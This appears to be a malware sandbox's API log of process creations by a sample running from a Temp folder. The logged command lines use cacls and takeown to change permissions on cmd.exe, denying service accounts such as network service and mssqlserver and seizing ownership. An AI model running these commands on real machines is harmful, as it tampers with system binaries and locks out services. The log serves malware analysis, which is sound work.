filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2124
thread_handle: 0x00000084
process_identifier: 2116
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2140
thread_handle: 0x00000094
process_identifier: 1156
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d "network service"
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2432
thread_handle: 0x0000008c
process_identifier: 2420
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2512
thread_handle: 0x00000084
process_identifier: 2500
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /g system:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x0000008c
1 1 0

CreateProcessInternalW

thread_identifier: 2568
thread_handle: 0x00000094
process_identifier: 2560
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo Y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2612
thread_handle: 0x0000008c
process_identifier: 2616
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\system32\cmd.exe /e /d mssql$sqlexpress
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2652
thread_handle: 0x00000094
process_identifier: 2648
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\takeown.exe
track: 1
command_line: takeown /f C:\Windows\SysWOW64\cmd.exe /a
filepath_r: C:\Windows\system32\takeown.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2660
thread_handle: 0x00000094
process_identifier: 2704
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 2784
thread_handle: 0x00000084
process_identifier: 2764
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /g Administrators:f
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2856
thread_handle: 0x00000090
process_identifier: 2860
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 2916
thread_handle: 0x00000094
process_identifier: 2920
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Users:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 2984
thread_handle: 0x00000084
process_identifier: 2988
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 3044
thread_handle: 0x00000090
process_identifier: 3048
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /g Administrators:r
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 880
thread_handle: 0x00000094
process_identifier: 948
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0

CreateProcessInternalW

thread_identifier: 2376
thread_handle: 0x00000084
process_identifier: 2404
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /d SERVICE
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000094
1 1 0

CreateProcessInternalW

thread_identifier: 2556
thread_handle: 0x00000090
process_identifier: 2432
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cmd.exe
track: 1
command_line: C:\Windows\system32\cmd.exe /S /D /c" echo y"
filepath_r: C:\Windows\system32\cmd.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000084
1 1 0

CreateProcessInternalW

thread_identifier: 1188
thread_handle: 0x00000094
process_identifier: 416
current_directory: C:\Users\test22\AppData\Local\Temp
filepath: C:\Windows\System32\cacls.exe
track: 1
command_line: cacls C:\Windows\SysWOW64\cmd.exe /e /d mssqlserver
filepath_r: C:\Windows\system32\cacls.exe
stack_pivoted: 0
creation_flags: 524288 (EXTENDED_STARTUPINFO_PRESENT)
inherit_handles: 1
process_handle: 0x00000090
1 1 0